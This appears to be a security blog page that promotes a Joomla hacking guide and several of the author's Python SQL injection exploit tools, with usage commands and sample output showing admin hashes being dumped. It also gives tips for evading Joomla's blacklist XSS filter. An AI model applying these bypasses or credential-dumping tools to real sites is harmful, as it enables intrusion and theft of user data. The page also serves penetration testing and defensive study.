With great pleasure I hereby announce the availability of the new “The Joomla Hacking Compendium”. It contains almost 1000 lines of pure knowledge and shows you the way to hack and protect Joomla.

It contains the following chapters:

0x01 - Purpose of this document
0x02 - Introduction
0x03 - The Basics of Joomla
0x04 - The Joomla core
0x05 - Joomla extensions
0x06 - Hacking Joomla
0x07 - SEO, our strongest enemy
0x08 - Examples for Joomla SQL injections
0x09 - Examples for Joomla local file inclusions
0x10 - Examples for Joomla remote file inclusions
0x11 - Examples for Joomla XSSs/CSRFs
0x12 - How to protect your Joomla
0x13 - Conclusion and a look at Joomla's feature
0x14 - How to stay informed (or: the latest vulnerabilities)
0x15 - Useful tools
0x16 - Greetings and THX

Please find an excerpt below:

::
:: 0x04 - The Joomla core
::

Before inspecting the Joomla component attack vendors we first have a
look at the core.

Download Joomla somewhere and extract all files. Open the file
libraries/phpinputfilter/inputfilter.php
and look at the code:
----------------------------------------
var $tagsArray; // default = empty array
var $attrArray; // default = empty array

var $tagsMethod; // default = 0
var $attrMethod; // default = 0

var $xssAuto; // default = 1
var $tagBlacklist = array ('applet', 'body', 'bgsound' [...]
var $attrBlacklist = array ('action', 'background'     [...]
----------------------------------------

As you can see, some filter methods of Joomla are based on blacklisting.
This knowledge can be used later to exploit potential vulnerabilities in
a better way. I find this method not very effective, btw.

While HTML tags containing "body" or "bgsound" will be filtered out
at input fields or URL parameters, they can be written in many ways,
e.g. like "bOdY" or "b o DY" etc. You are only limited by your
creativity and will find ways for tricking the blacklist of the
Joomla framework.

Another interesting part is this one (same file):
----------------------------------------
/*
* Is there a tag? If so it will certainly start with a '<'
*/
$tagOpen_start  = strpos($source, '<');
while ($tagOpen_start !== false)
{
/*
* Get some information about the tag we are processing
*/
$preTag            .= substr($postTag, 0, $tagOpen_start);
$postTag                = substr($postTag, $tagOpen_start);
----------------------------------------

As you can see they assume that an HTML tag being used in XSS attacks
starts with a "<". In fact, I never use this character and many
XSS cheatsheets suggest this, too. With this information in mind,
you can most likely avoid being detected by the filters. You can start
your XSS string with "><tag... for example.

If you want to you can continue looking. You will find other filter
methods and, at the end of the file, there are also built in
mechanics which should help to prevent SQL injection vulnerabilities:
[...]

Description
The Specialist Bed and Breakfast Website SQL Injection Exploit takes advantage of a SQL injection vulnerability JaMbA discovered on 30th June 2010. The exploit source code also contains the table structure of the vulnerable product.

About the vulnerability
Learn more about the vulnerability here.

Features
- Check if provided URL is reachable
- Error handling for HTTP requests
- Display current database, MySQL user and the MySQL version
- Display the admin login data
- Easy to use (everything is simple and automated)
- User agent for HTTP requests

Additional information
Written in Python (less than 400 lines).

Usage example
python bed_and_breakfast_sploit.py – u “http://target/site/pages.php?fid=0,1,472&pp_id=84″

Disclaimer
Only use this tool to check websites you are allowed to test (e.g. for penetration testing). Never use this tool on foreign websites! Know and respect your local laws! I am not responsible if you cause any damage or run into trouble. This tool was written for educational purposes only.

Please click here to download the Python sploit.

Usage example:
python joomla_com_bfquiz_sploit.py – u “http://target/index.php?option=com_bfquiztrial&view=bfquiztrial&catid=34″

Features:
- Check if the provided URL is reachable
- Display current database, MySQL user and the MySQL version
- Display the password hash of the Joomla administrator

Screenshot:

Additional information
Only attack targets you are allowed to attack (e.g. your own website or a customer’s website for penetration testing). I am not responsible if you cause any damage or do bad things! Know and respect your local laws!

I wrote this tool because I did not want to write a new exploit every time when a new Joomla (component/module/plugin) SQL injection vulnerability was discovered/revealed. Simply hand over a vulnerable Joomla URL to the tool and receive all Joomla users (with password hashes).

Description
The Automated Joomla SQL Injection Exploiter exploits almost every SQL injection vulnerability which was and will be discovered in Joomla or it’s components/modules/plugins. From now on you don’t need an exploit for every new SQL injection vulnerability! Just hand over the vulnerable URL to the tool and receive a list of Joomla users. The Automated Joomla SQL Injection Exploiter is based on my column fuzzer.

Features
- Check if URL is reachable
- Fuzz amount of columns (needed for UNION SELECT attack)
- Show a sample exploitation URL for pasting into the browser
- Showing the Joomla users from the table jos_users (with password hashes)
- Display current database, database user and database version

Additional information
Written in Python (less than 300 lines).

Screenshots

Usage
root@localhost: python joomla_sqli_sploiter.py -u “http://target/index.php?option=com_vulnerable?id=1″

Disclaimer
Tool was written for educational purposes only. I am not responsible for any damage you might cause using this tool. Know and respect your local laws! Only use this tool on websites you are allowed to test, e.g. for penetration testing.

Sample Output (bad formatted, sorry about that)
<root@localhost: python joomla_sqli_sploiter.py -u “http://target/index.php?com_option=blubb&id=1″
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(^_^),~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Automated Joomla SQL Injection Exploiter 1.0 (23th May 2010)
by Valentin Hoebel (valentin@xenuser.org)
For educational purposes only! I am not responsible if you cause any damage!
Only use this tool on websites which you may test, e.g. for penetration testing.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(^_^),~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>> Checking if connection can be established…
>> Connected to target! URL seems to be valid.
>> Assuming that your provided URL is vulnerable.
>> Trying to find the correct number of columns… (this may take a while)
>> Correct number of columns found!
>> Amount:  21
>> Do you want to have a sample exploitation URL for pasting into the browser? (Yes/No) no
>> Viewing a sample exploitation URL was skipped!
>> Now assuming that this is a Joomla installation.
>> Trying to fetch the first user of the Joomla user table…
ID:  ['62']
Name:  ['Administrator'] Username:  ['admin']
Password Hash:  ['censored']
E-Mail Address:  ['valentin@xenuser.org'] User status:  ['Super Administrator']
>> Do you want to display all Joomla users? Replying with Yes will show you the source code response of the website. (Yes/No) no
>> Viewing the Joomla user table output was skipped!
>> Do you want to display the current database, database user and MySQL version? (Yes/No) yes
MySQL Database User:  ['root@localhost']
MySQL Database:  ['joomla']
MySQL Version:  ['5.1.34-0.dotdeb.1-log']
That’s it. Bye!

The sploit is based on my column fuzzer and the enhanced Joomla exploitation tool I wrote

You can find the exploit here.